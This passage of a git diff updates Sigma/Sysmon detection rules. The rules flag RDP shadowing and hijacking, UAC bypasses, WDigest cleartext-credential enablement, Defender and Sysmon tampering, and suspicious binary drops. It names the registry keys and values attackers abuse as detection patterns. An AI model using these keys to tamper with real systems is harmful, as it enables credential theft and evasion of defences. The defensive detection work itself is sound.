https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services -author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine - Bencherchali + - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information + - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information) +author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali date: 2022/08/06 modified: 2023/08/17 tags: @@ -44,29 +40,28 @@ detection: - \Control\Terminal Server\ TargetObject|endswith: \Shadow Details: - - DWORD (0x00000001) - - DWORD (0x00000002) - - DWORD (0x00000003) - - DWORD (0x00000004) + - DWORD (0x00000001) # Full Control with user’s permission + - DWORD (0x00000002) # Full Control without user’s permission + - DWORD (0x00000003) # View Session with user’s permission + - DWORD (0x00000004) # View Session without user’s permission selection_terminal_services_key: TargetObject|contains: - \Control\Terminal Server\ - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\ selection_terminal_services_values: TargetObject|endswith: - - \fAllowUnsolicited + - \fAllowUnsolicited # Allow unsolicited remote assistance offers - \fAllowUnsolicitedFullControl Details: DWORD (0x00000001) selection_tamper_only: + # Any changes to these keys should be suspicious and looked at TargetObject|contains: - - \services\TermService\Parameters\ServiceDll - - \Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram - - \Control\Terminal Server\InitialProgram - - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\InitialProgram - condition: registry_set and (selection_shadow or (selection_terminal_services_key - and selection_terminal_services_values) or selection_tamper_only) + - \services\TermService\Parameters\ServiceDll # RDP hijacking + - \Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram # This value can be set to specify a program to run automatically when a user logs on to a remote computer. + - \Control\Terminal Server\InitialProgram # This value can be set to specify a program to run automatically when a user logs on to a remote computer. + - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\InitialProgram # This value can be set to specify a program to run automatically when a user logs on to a remote computer. + condition: registry_set and (selection_shadow or (selection_terminal_services_key and selection_terminal_services_values) or selection_tamper_only) falsepositives: - - Some of the keys mentioned here could be modified by an administrator while - setting group policy (it should be investigated either way) + - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml b/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml index b817ce9c4..fb3079d65 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml @@ -1,14 +1,10 @@ title: Set TimeProviders DllName id: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 status: experimental -description: 'Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. - +description: | + Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. - - The Windows Time service (W32Time) enables time synchronization across and within - domains. - - ' + The Windows Time service (W32Time) enables time synchronization across and within domains. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml b/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml index f616cd91e..5c38284c2 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml @@ -1,8 +1,7 @@ title: Old TLS1.0/TLS1.1 Protocol Version Enabled id: 439957a7-ad86-4a8f-9705-a28131c6821b status: experimental -description: Detects applications or users re-enabling old TLS versions by setting - the "Enabled" value to "1" for the "Protocols" registry key. +description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. references: - https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml index 864fe09bb..89ff86a56 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml @@ -27,8 +27,12 @@ detection: filter_office2: Image: C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_svchost: + # Example of target object by svchost + # TargetObject: HKLM\SOFTWARE\Microsoft\MsixRegistryCompatibility\Package\Microsoft.Paint_11.2208.6.0_x64__8wekyb3d8bbwe\User\SOFTWARE\Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default) + # TargetObject: HKU\S-1-5-21-1000000000-000000000-000000000-0000_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default) Image: C:\Windows\system32\svchost.exe filter_misexec: + # This FP has been seen during installation/updates Image: - C:\Windows\system32\msiexec.exe - C:\Windows\SysWOW64\msiexec.exe diff --git a/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml b/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml index 511696186..4f05c5b28 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml @@ -1,12 +1,10 @@ title: Potential Signing Bypass Via Windows Developer Features - Registry id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 related: - - id: a383dec4-deec-4e6e-913b-ed9249670848 - type: similar + - id: a383dec4-deec-4e6e-913b-ed9249670848 + type: similar status: experimental -description: Detects when the enablement of developer features such as "Developer - Mode" or "Application Sideloading". Which allows the user to install untrusted - packages. +description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. references: - https://twitter.com/malmoeb/status/1560536653709598721 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml index 1cc14cecf..7721adae4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml @@ -1,8 +1,7 @@ title: UAC Bypass via Sdclt id: 5b872a46-3b90-45c1-8419-f675db8053aa status: experimental -description: Detects the pattern of UAC Bypass using registry key manipulation of - sdclt.exe (e.g. UACMe 53) +description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) references: - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - https://github.com/hfiref0x/UACME diff --git a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml index 8535d1b08..11faecb7a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml @@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - Registry id: 6597be7b-ac61-4ac8-bef4-d3ec88174853 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml index 0313fe7e3..776bb47c6 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Registry id: 5f9db380-ea57-4d1e-beab-8a2d33397e93 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,8 +20,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility - Assistant\Store\C:\Program Files\Windows Media Player\osk.exe + TargetObject|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe Details: Binary Data condition: registry_set and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml b/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml index fe075db3e..dad30ba75 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -1,8 +1,7 @@ title: VBScript Payload Stored in Registry id: 46490193-1b22-4c29-bdd6-5bf63907216f status: experimental -description: Detects VBScript content stored into registry keys as seen being used - by UNC2452 group +description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml b/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml index 276efb5c7..8cec1a469 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml @@ -1,8 +1,7 @@ title: Execution DLL of Choice Using WAB.EXE id: fc014922-5def-4da9-a0fc-28c973f41bfb status: test -description: This rule detects that the path to the DLL written in the registry is - different from the default one. Launched WAB.exe tries to load the DLL from Registry. +description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml - https://twitter.com/Hexacorn/status/991447379864932352 diff --git a/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml b/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml index b0b964067..08118037e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml @@ -1,9 +1,7 @@ title: Wdigest Enable UseLogonCredential id: d6a9b252-c666-4de6-8806-5561bbbd3bdc status: test -description: Detects potential malicious modification of the property value of UseLogonCredential - from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable - clear-text credentials +description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials references: - https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html - https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649 diff --git a/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml index c652e8e8e..062c4d895 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml @@ -1,13 +1,12 @@ title: Disable Windows Defender Functionalities Via Registry Keys id: 0eb46774-f1ab-4a74-8238-1155855f2263 related: - - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 - type: obsoletes - - id: fd115e64-97c7-491f-951c-fc8da7e042fa - type: obsoletes + - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 + type: obsoletes + - id: fd115e64-97c7-491f-951c-fc8da7e042fa + type: obsoletes status: experimental -description: Detects when attackers or tools disable Windows Defender functionalities - via the Windows registry +description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry references: - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 @@ -16,8 +15,7 @@ references: - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html -author: "AlertIQ, J\xE1n Tren\u010Dansk\xFD, frack113, Nasreddine Bencherchali, Swachchhanda\ - \ Shrawan Poudel" +author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel date: 2022/08/01 modified: 2023/08/17 tags: diff --git a/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml b/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml index 32630394d..55fe2435c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml @@ -1,8 +1,7 @@ title: Winget Admin Settings Modification id: 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 status: experimental -description: Detects changes to the AppInstaller (winget) admin settings. Such as - enabling local manifest installations or disabling installer hash checks +description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget - https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13 @@ -26,7 +25,6 @@ detection: TargetObject|endswith: \LocalState\admin_settings condition: registry_set and selection falsepositives: - - The event doesn't contain information about the type of change. False positives - are expected with legitimate changes + - The event doesn't contain information about the type of change. False positives are expected with legitimate changes level: low ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml b/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml index 3c1bcdbff..4d400db53 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml @@ -1,9 +1,7 @@ title: Enable Local Manifest Installation With Winget id: fa277e82-9b78-42dd-b05c-05555c7b6015 status: experimental -description: Detects changes to the AppInstaller (winget) policy. Specifically the - activation of the local manifest installation, which allows a user to install - new packages via custom manifests. +description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget author: Nasreddine Bencherchali (Nextron Systems) @@ -25,7 +23,6 @@ detection: Details: DWORD (0x00000001) condition: registry_set and selection falsepositives: - - Administrators or developers might enable this for testing purposes or to install - custom private packages + - Administrators or developers might enable this for testing purposes or to install custom private packages level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml index a0e22e129..9b5663aca 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml @@ -1,14 +1,10 @@ title: Winlogon AllowMultipleTSSessions Enable id: f7997770-92c3-4ec9-b112-774c4ef96f96 status: experimental -description: 'Detects when the ''AllowMultipleTSSessions'' value is enabled. - +description: | + Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. - - This is often used by attacker as a way to connect to an RDP session without disconnecting - the other users - - ' + This is often used by attacker as a way to connect to an RDP session without disconnecting the other users references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml b/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml index c8dfea2bc..5ef0cdf52 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml @@ -1,13 +1,9 @@ title: Winlogon Notify Key Logon Persistence id: bbf59793-6efb-4fa1-95ca-a7d288e52c88 status: test -description: 'Adversaries may abuse features of Winlogon to execute DLLs and/or executables - when a user logs in. - - Winlogon.exe is a Windows component responsible for actions at logon/logoff as - well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - - ' +description: | + Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. + Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell author: frack113 diff --git a/sigma/sysmon/sysmon/sysmon_config_modification.yml b/sigma/sysmon/sysmon/sysmon_config_modification.yml index df300db41..b4aaca0a6 100644 --- a/sigma/sysmon/sysmon/sysmon_config_modification.yml +++ b/sigma/sysmon/sysmon/sysmon_config_modification.yml @@ -1,8 +1,7 @@ title: Sysmon Configuration Change id: 8ac03a65-6c84-4116-acad-dc1558ff7a77 status: test -description: Detects a Sysmon configuration change, which could be the result of a - legitimate reconfiguration or someone trying manipulate the configuration +description: Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon author: frack113 @@ -18,6 +17,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: EventID: 16 + # To avoid FP just add + # filter: + # ConfigurationFileHash: 'SHA256=The_Hash_Of_Your_Valid_Config_XML' + # condition: selection and not filter condition: sysmon and selection falsepositives: - Legitimate administrative action diff --git a/sigma/sysmon/sysmon/sysmon_config_modification_error.yml b/sigma/sysmon/sysmon/sysmon_config_modification_error.yml index e7c512317..10a40f865 100644 --- a/sigma/sysmon/sysmon/sysmon_config_modification_error.yml +++ b/sigma/sysmon/sysmon/sysmon_config_modification_error.yml @@ -1,8 +1,7 @@ title: Sysmon Configuration Error id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 status: test -description: Detects when an adversary is trying to hide it's action from Sysmon logging - based on error messages +description: Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html diff --git a/sigma/sysmon/sysmon/sysmon_config_modification_status.yml b/sigma/sysmon/sysmon/sysmon_config_modification_status.yml index 5d5cd3a6b..de5432e08 100644 --- a/sigma/sysmon/sysmon/sysmon_config_modification_status.yml +++ b/sigma/sysmon/sysmon/sysmon_config_modification_status.yml @@ -1,8 +1,7 @@ title: Sysmon Configuration Modification id: 1f2b5353-573f-4880-8e33-7d04dcf97744 status: test -description: Detects when an attacker tries to hide from Sysmon by disabling or stopping - it +description: Detects when an attacker tries to hide from Sysmon by disabling or stopping it references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html diff --git a/sigma/sysmon/sysmon/sysmon_file_block_executable.yml b/sigma/sysmon/sysmon/sysmon_file_block_executable.yml index ffc9a1d06..32507abc4 100644 --- a/sigma/sysmon/sysmon/sysmon_file_block_executable.yml +++ b/sigma/sysmon/sysmon/sysmon_file_block_executable.yml @@ -1,8 +1,7 @@ title: Sysmon Blocked Executable id: 23b71bc5-953e-4971-be4c-c896cda73fc2 status: experimental -description: Triggers on any Sysmon "FileBlockExecutable" event, which indicates a - violation of the configured block policy +description: Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy references: - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: sysmon: Channel: Microsoft-Windows-Sysmon/Operational selection: - EventID: 27 + EventID: 27 # this is fine, we want to match any FileBlockExecutable event condition: sysmon and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml b/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml index bb81e43ec..ef9c4ecbe 100644 --- a/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml +++ b/sigma/sysmon/sysmon/sysmon_file_block_shredding.yml @@ -1,8 +1,7 @@ title: Sysmon Blocked File Shredding id: c3e5c1b1-45e9-4632-b242-27939c170239 status: experimental -description: Triggers on any Sysmon "FileBlockShredding" event, which indicates a - violation of the configured shredding policy. +description: Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon author: frack113 @@ -17,7 +16,7 @@ detection: sysmon: Channel: Microsoft-Windows-Sysmon/Operational selection: - EventID: 28 + EventID: 28 # this is fine, we want to match any FileBlockShredding event condition: sysmon and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml b/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml index 0a11c5aa3..c4ba26ff5 100644 --- a/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml +++ b/sigma/sysmon/sysmon/sysmon_file_executable_detected.yml @@ -1,8 +1,7 @@ title: Sysmon File Executable Creation Detected id: 693a44e9-7f26-4cb6-b787-214867672d3a status: experimental -description: Triggers on any Sysmon "FileExecutableDetected" event, which triggers - every time a PE that is monitored by the config is created. +description: Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon - https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36 @@ -18,7 +17,7 @@ detection: sysmon: Channel: Microsoft-Windows-Sysmon/Operational selection: - EventID: 29 + EventID: 29 # this is fine, we want to match any FileExecutableDetected event condition: sysmon and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml b/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml index 67850d37b..d5d9ff804 100644 --- a/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml +++ b/sigma/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml @@ -1,11 +1,10 @@ title: Remote Thread Creation Via PowerShell id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 related: - - id: 99b97608-3e21-4bfe-8217-2a127c396a0e - type: derived + - id: 99b97608-3e21-4bfe-8217-2a127c396a0e + type: derived status: test -description: Detects the creation of a remote thread from a Powershell process to - another process +description: Detects the creation of a remote thread from a Powershell process to another process references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Nikita Nazarov, oscd.community diff --git a/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml b/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml index 75278fe61..37330cc97 100644 --- a/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml +++ b/sigma/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml @@ -1,12 +1,10 @@ title: ADS Zone.Identifier Deleted id: 7eac0a16-5832-4e81-865f-0268a6d19e4b related: - - id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae - type: similar + - id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae + type: similar status: experimental -description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage - this in order to bypass security restrictions that make use of the ADS such as - Microsoft Office apps. +description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. references: - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/ author: frack113 diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml index 292da8e4e..231260602 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml @@ -1,9 +1,7 @@ title: DMP/HDMP File Creation id: 3a525307-d100-48ae-b3b9-0964699d7f97 status: experimental -description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often - created by software during a crash. Memory dumps can sometimes contain sensitive - information such as credentials. It's best to determine the source of the crash. +description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. references: - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml index bd0600218..b0cc8114a 100644 --- a/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml +++ b/sigma/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml @@ -31,14 +31,22 @@ detection: - :\WINDOWS\system32\Dism.exe - :\Windows\System32\wuauclt.exe filter_main_update: + # Security_UserID: S-1-5-18 + # Example: + # TargetFilename: C:\Windows\SoftwareDistribution\Download\803d1df4c931df4f3e50a022cda56e88\WindowsUpdateBox.exe Image|endswith: :\WINDOWS\system32\svchost.exe TargetFilename|contains: :\Windows\SoftwareDistribution\Download\ filter_main_upgrade: Image|endswith: :\Windows\system32\svchost.exe TargetFilename|contains|all: + # Example: + # This example was seen during windows upgrade + # TargetFilename: :\WUDownloadCache\803d1df4c931df4f3e50a022cda56e29\WindowsUpdateBox.exe - :\WUDownloadCache\ - \WindowsUpdateBox.exe filter_main_windows_update_box: + # This FP was seen during Windows Upgrade + # ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s wuauserv Image|contains: :\WINDOWS\SoftwareDistribution\Download\ Image|endswith: \WindowsUpdateBox.Exe TargetFilename|contains: :\$WINDOWS.~BT\Sources\ @@ -46,12 +54,12 @@ detection: Image|contains: :\Windows\WinSxS\ Image|endswith: \TiWorker.exe filter_main_programfiles: - - Image|contains: - - :\Program Files\ - - :\Program Files (x86)\ - - TargetFilename|contains: - - :\Program Files\ - - :\Program Files (x86)\ + - Image|contains: + - :\Program Files\ + - :\Program Files (x86)\ + - TargetFilename|contains: + - :\Program Files\ + - :\Program Files (x86)\ filter_main_defender: Image|contains: - :\ProgramData\Microsoft\Windows Defender\ @@ -65,6 +73,12 @@ detection: - \AppData\Local\Microsoft\Teams\stage\Squirrel.exe - \AppData\Local\Microsoft\SquirrelTemp\tempb\ filter_main_mscorsvw: + # Example: + # ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" ExecuteQueuedItems /LegacyServiceBehavior + # Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe + # TargetFilename: C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4f8c-0\MSBuild.exe + # TargetFilename: C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\49bc-0\testhost.net47.x86.exe + # TargetFilename: C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\39d8-0\fsc.exe Image|contains: :\Windows\Microsoft.NET\Framework\ Image|endswith: \mscorsvw.exe TargetFilename|contains: :\Windows\assembly\NativeImages_ @@ -74,10 +88,13 @@ detection: TargetFilename|contains: \.vscode\extensions\ filter_main_githubdesktop: Image|endswith: \AppData\Local\GitHubDesktop\Update.exe + # Example TargetFileName: + # \AppData\Local\SquirrelTemp\tempb\lib\net45\GitHubDesktop_ExecutionStub.exe + # \AppData\Local\SquirrelTemp\tempb\lib\net45\squirrel.exe 